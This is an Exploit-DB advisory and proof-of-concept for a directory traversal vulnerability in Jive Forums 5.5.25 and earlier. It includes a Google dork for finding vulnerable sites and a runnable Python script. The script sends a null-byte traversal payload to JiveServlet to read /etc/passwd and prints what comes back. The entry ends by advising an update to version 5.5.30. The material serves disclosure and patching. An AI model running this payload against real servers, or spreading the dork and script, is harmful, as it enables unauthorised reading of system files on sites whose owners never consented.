Jive Forums 5.5.25 - Directory Traversal

EDB-ID:

39405


Author:

ZhaoHuAn

Type:

webapps


Platform:

JSP

Date:

2016-02-03


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

'''
JiveForums <=5.5.25 Directory Traversal Vulnerability

Description
==========
Jive forums is a widely recognized network community. Its products have been used by global IT giants including IBM, HP, Oracle, Adobe, Cisco, Intel, Amazon, Emc, Mcafee, Rapid7, Fireeye, etc.
The version of JiveForums <=5.5.25 and < 4.0 are vulnerable to a directory traversal security issue, other versions may also be affected.

Details
=======
Product: JiveSoftware
Security-Risk: high
Remote-Exploit: yes
Vendor-URL: https://www.jivesoftware.com

Credits
============
Discovered by: Zhaohuan of Tencent Security
Site: http://security.tencent.com

Affected Products:
=================
Test on  JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2
maybe work <= 5.5.25

Exploit:
============
'''

#!/usr/bin/python
# Author: Zhaohuan || http://weibo.com/hackyou
# Google Dork: inurl:servlet/JiveServlet
# Tested on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2
#
# Software Link: https://www.jivesoftware.com

import urllib2
import sys

print "JiveForums <=5.5.25 Directory Traversal Exploit"

if len(sys.argv) != 3:
    print "[-] Trying exploit on : <site> <path>"
    print "[*] Usage: %s http://localhost /jiveforums/" % sys.argv[0]
    sys.exit()

payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg'
print "[+] Trying to request :"+sys.argv[1]+sys.argv[2]+payload
response=urllib2.urlopen(sys.argv[1]+sys.argv[2]+payload)
readvul=response.read()
print readvul


'''
Solution:
============
Update to jiveforums 5.5.30 or the latest version.

More Information:
https://www.jivesoftware.com/services-support/
'''